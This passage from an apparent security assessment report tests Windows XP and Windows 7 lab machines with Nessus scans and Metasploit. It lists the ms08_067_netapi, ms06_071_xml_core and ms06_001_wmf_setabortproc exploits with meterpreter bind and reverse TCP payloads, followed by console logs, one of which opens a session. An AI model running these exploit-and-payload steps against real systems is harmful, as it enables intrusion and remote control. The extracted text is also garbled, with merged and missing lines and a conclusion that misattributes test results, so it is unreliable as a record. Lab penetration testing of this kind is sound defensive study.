Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0Description : Unknown RPC service




Object UUID : 00000000-0000-0000-0000-000000000000



PAGE | 53






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0Description : Unknown RPC service




Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000

UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0






PAGE | 54

Named pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : NRP server endpoint Type : Local RPC service


Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : AudioClientRpc

Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : Audiosrv

Object UUID : 00000000-0000-0000-0000-000000000000





Type : Local RPC serviceNamed pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0








PAGE | 55

Object UUID : 00000000-0000-0000-0000-000000000000




Annotation : DHCP Client LRPC Endpoint Type : Local RPC service

Named pipe : dhcpcsvc

Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000


Description : Unknown RPC serviceAnnotation : DHCPv6 Client LRPC Endpoint


Named pipe : dhcpcsvc6

Object UUID : 00000000-0000-0000-0000-000000000000




PAGE | 56





Object UUID : 00000000-0000-0000-0000-000000000000UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0





Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000


Description : Unknown RPC serviceAnnotation : Security Center


Named pipe : dhcpcsvc6

Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : OLEE4C5DBF62E0E4163A84295240E81

Nessus ID : 10736







PAGE | 57

Port rtsp (554/tcp)

Port icslap (2869/tcp)

Port netbios-ssn (139/tcp)

SMB Detection

Synopsis :


Description :




Solution :

n/a

Risk factor :

None

Plugin output :

An SMB server is running on this port.

Nessus ID : 11011







PAGE | 58



Synopsis :


Description :

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the

Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible t

connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution :

N/A

Risk factor :

None

Plugin output :


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0

Description : IPsec Services (Windows XP & 2003)Windows process : lsass.exe

Annotation : IPSec Policy agent endpoint


TCP Port : 49299

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0


Annotation : Remote Fw APIs

Type : Remote RPC serviceTCP Port : 49299

IP : 192.168.0.171

Nessus ID : 10736







PAGE | 59

PENETRATION TESTING (METASPLOIT)

Metasploit, specifically the Metasploit Framework is an open-source tool used for

penetration testing and signature development. The tool presents nearly endless combinations of

exploits and payloads that can be used to test multiple aspects of a remote machine's security. As

such, it was used to test penetrable points in both the Windows XP and Windows 7 virtualmachines. This was done using the following combination of exploits and payloads.

The exploit and payload information was taken from the information dialogs provided

within Metasploit 3.3. Following the exploit and payload information are the test results from the

remote host testing. Six tests were performed on each virtual machine, and the test process is

detailed. For complete installation and setup of Metasploit reference the Vantage Point Computing

Policy Document.

EXPLOITS

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

Command: msf > windows/smb/ms08_067_netapi

Version: 5888

Platform: Windows

Privileged: Yes

License: Metasploit Framework License (BSD)

Payload information:

Space: 400

Avoid: 8 characters

Description:

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server

Service. This module is capable of bypassing NX on some operating systems and service packs. The

correct target must be used to prevent the Server Service (along with a dozen others in the same

process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but

2003 targets will often crash or hang on subsequent attempts. This is just the first version of thismodule, full support for NX bypass on 2003, along with other platforms, is still in development.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250



PAGE | 60

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

Command: msf > windows/browser/ms06_071_xml_core

Version: 5773

Platform: Windows

Privileged: No



Space: 1024

Avoid: 1 character

Description:

This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in

the XMLHTTP ActiveX control. This module is the modified version of

http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully

tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft

XML Core Services 4.0 SP2.

References:

http://www.microsoft.com/technet/security/bulletin/MS06-071.mspx


http://www.securityfocus.com/bid/20915

http://www.osvdb.org/29425



PAGE | 61

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION

Command: msf > windows/browser/ms06_001_wmf_setabortproc

Version: 7611

Platform: Windows

Privileged: No



Space: 1040

Avoid: 1 characters

Description:

This module exploits a vulnerability in the GDI library included with Windows XP and 2003. Thisvulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProcprocedure. This module generates a random WMF record stream for each request.

References:


http://www.osvdb.org/21987

http://www.microsoft.com/technet/security/bulletin/MS06-001.mspx

http://www.securityfocus.com/bid/16074http://www.microsoft.com/technet/security/advisory/912840.mspx

http://wvware.sourceforge.net/caolan/ora-wmf.html

http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt



PAGE | 62

PAYLOADS

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

Command: msf> windows/meterpreter/bind_tcp

Version: 7075, $Revision$, 7546

Platform: Windows

Arch: x86

Needs Admin: No

Total size: 298

Description:

Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

Command: msf> windows/meterpreter/reverse_tcp

Version: 7217, $Revision$, 7546

Platform: Windows

Arch: x86

Needs Admin: No

Total size: 290

Description:

Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injectionpayload



PAGE | 63

WINDOWS XP

TEST 1



msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set rhost 192.168.0.166

rhost => 192.168.0.166

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Triggering the vulnerability...

[*] Exploit completed, but no session was created.

TEST 2



msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set lhost 192.168.0.166

lhost => 192.168.0.166


[*] Started reverse handler


[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Triggering the vulnerability...




PAGE | 64

TEST 3



msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcppayload => windows/meterpreter/bind_tcp

msf exploit(ms06_071_xml_core) > set rhost 192.168.0.166

rhost => 192.168.0.166

msf exploit(ms06_071_xml_core) > exploit

[*] Exploit running as background job.


[*] Using URL: http://0.0.0.0:8080/Ylyb4Hd

[*] Local IP: http://192.168.0.196:8080/Ylyb4Hd

[*] Server started.

TEST 4



msf > use windows/browser/ms06_071_xml_core

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp


msf exploit(ms06_071_xml_core) > set lhost 192.168.0.166

lhost => 192.168.0.166



[*] Started reverse handler

[*] Using URL: http://0.0.0.0:8080/VCk957jpkpSW6J3

[*] Local IP: http://192.168.0.196:8080/VCk957jpkpSW6J3

[*] Server started.



PAGE | 65

TEST 5



msf > use windows/browser/ms06_001_wmf_setabortprocmsf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp


msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166

rhost => 192.168.0.166

msf exploit(ms06_001_wmf_setabortproc) > exploit


msf exploit(ms06_001_wmf_setabortproc) >


[*] Using URL: http://0.0.0.0:8080/I0R0jq7Efcxn08

[*] Local IP: http://192.168.0.196:8080/I0R0jq7Efcxn08

[*] Server started.

TEST 6

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTIONWINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

msf > use windows/browser/ms06_001_wmf_setabortproc

msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp



rhost => 192.168.0.166

msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.166

lhost => 192.168.0.166





PAGE | 66


[*] Using URL: http://0.0.0.0:8080/c5wMfJ8gXdTk

[*] Started reverse handler on port 4444

[*] Local IP: http://192.168.0.196:8080/c5wMfJ8gXdTk [*] Server started.



PAGE | 67

WINDOWS 7

TEST 1



msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bindtcp

[-] The value specified for payload is not valid.

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp



rhost => 192.168.0.171




[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown

[*] Could not determine the exact language pack


TEST 2



msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp


msf exploit(ms08_067_netapi) > set lhost 192.168.0.171

lhost => 192.168.0.171


rhost => 192.168.0.171



PAGE | 68


[*] Started reverse handler on port 4444


[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown[*] Could not determine the exact language pack


TEST 3




msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp



rhost => 192.168.0.171



msf exploit(ms06_071_xml_core) > [*] Started bind handler

[*] Using URL: http://0.0.0.0:8080/H2MNFt9yRjH4N0q

[*] Local IP: http://192.168.0.196:8080/H2MNFt9yRjH4N0q

[*] Server started.

TEST 4




msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp




PAGE | 69


rhost => 192.168.0.171

msf exploit(ms06_071_xml_core) > set lhost 192.168.0.171

lhost => 192.168.0.171msf exploit(ms06_071_xml_core) > exploit


msf exploit(ms06_071_xml_core) > [*] Started reverse handler on port 4444

[*] Using URL: http://0.0.0.0:8080/m8MRYtwpxBsaeP

[*] Local IP: http://192.168.0.196:8080/m8MRYtwpxBsaeP

[*] Server started.

TEST 5



msf > use windows/browser/ms06_001_wmf_setabortproc

msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp



rhost => 192.168.0.171





[*] Using URL: http://0.0.0.0:8080/LJTnPF9ZUf

[*] Local IP: http://192.168.0.196:8080/LJTnPF9ZUf

[*] Server started.



PAGE | 70


[*] Sending exploit to 192.168.0.196:1199...

[*] Sending stage (719360 bytes)

[*] Meterpreter session 1 opened (192.168.0.196:1201 -> 192.168.0.196:4444)



PAGE | 71

TEST 6



msf > use windows/browser/ms06_001_wmf_setabortprocmsf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp



rhost => 192.168.0.171

msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.171

lhost => 192.168.0.171



msf exploit(ms06_001_wmf_setabortproc) > [*] Started reverse handler on port 4444

[*] Using URL: http://0.0.0.0:8080/JfNUisgBdnRRa

[*] Local IP: http://192.168.0.196:8080/JfNUisgBdnRRa

[*] Server started.

[*] Sending exploit to 192.168.0.196:1267...



PAGE | 72

CONCLUSION

As with any scientific test, empirical evidence must be presented in order to draw legitimate

conclusions. In addition to this, test results must be corroborated in order to verify authenticity.This is the reason that multiple tools were used to test the security of the two remote machines (the

virtual machines). While NMap, Nessus, and Metasploit have different specialties, they are all

necessary pieces of a larger puzzle - computer security.

In order to fully verify true security, the tools must be considered together. For instance,

basing results strictly on NMap scans would yield the conclusion that Windows XP is far more

secure that Windows 7. This would be due to the fact that Windows XP has no unfiltered ports and

Windows 7 has seven "open ports." However, the Nessus scan concludes that Windows XP has five

open ports and Windows 7 has twelve. Additionally, there are multiple low vulnerabilities present

in each operating system.

The vulnerabilities present in each operating system have the same underlying processes:Server Message Block (SMB) and Distributed Computing Environment (DCE). SMB is an

application-layer protocol that provides shared access to computing resources like files, printers,

and ports. Reducing it to the most basic level, it functions as the "Microsoft Windows Network."

DCE is a software system that functions as a framework for client/server interactions. The most

pertinent aspect is the remote procedure call system which allows work to be performed across

multiple computers.

While the aforementioned processes are both issues, the important thing to consider is their

presence in the operating systems. These vulnerabilities are not limited to one particular version of

the Windows operating system (though Windows 7 does have more low priority vulnerabilities);

they are present in both of them. These vulnerabilities exist below average user interaction, so they

remain invisible to most users.

This is why they are the most dangerous types of vulnerabilities because they require no

out-of-the-box user configuration to compromise the system. For instance, installing iTunes,

Winamp, or MediaMonkey will make the system vulnerable in certain ways. Users sign-up for these

vulnerabilities when the install the programs. Because of this, Metasploit exploit and payload

combinations were chosen that target vulnerabilities related to base level functionality like SMB,

DCE, and TCP networking.

Both systems were equally as vulnerable to actual penetration. Metasploit Tests 1 & 2 were

unable to start servers on both the XP and 7 hosts. However, Tests 3 & 4 successfully created

servers on both the Windows XP and 7 machines; a server which was able to successfully open a

corrupt .wmf or image file when the link to the created server was used. This is particularly odd

given the fact that NMap and Nessus reported different open ports and vulnerabilities.

Ultimately, both operating systems have exploitable vulnerabilities that are present, even

with patching and no superfluous programs installed. The lesson is that removing end-users from



the picture does not completely remove potential security issues. Only true diligence on the part of

the security personnel can truly harden a system.

Windows XP is an industrial, no frills operating system that was revolutionary when it was

originally released in 2001. Windows 7 is a multimedia operating system more aimed at the

general public than it is at the enterprise. Given the relative ubiquity of Moore's Law, end-users will

be more familiar with Windows 7 than Windows XP in a year and a half. As such, it makes sense tobegin to learn the Windows 7 platform because it does not lack the base functionality that Windows

Vista had. Windows 7 is basically Windows XP with a better user interface, better user access

control, and more frills. Microsoft may have neglected to patch some of the existing holes, but they

really went back to the drawing board with all the other aspects and it should be integrated into the

enterprise upgrade plan.

Documents

Enterprise Architecture Testing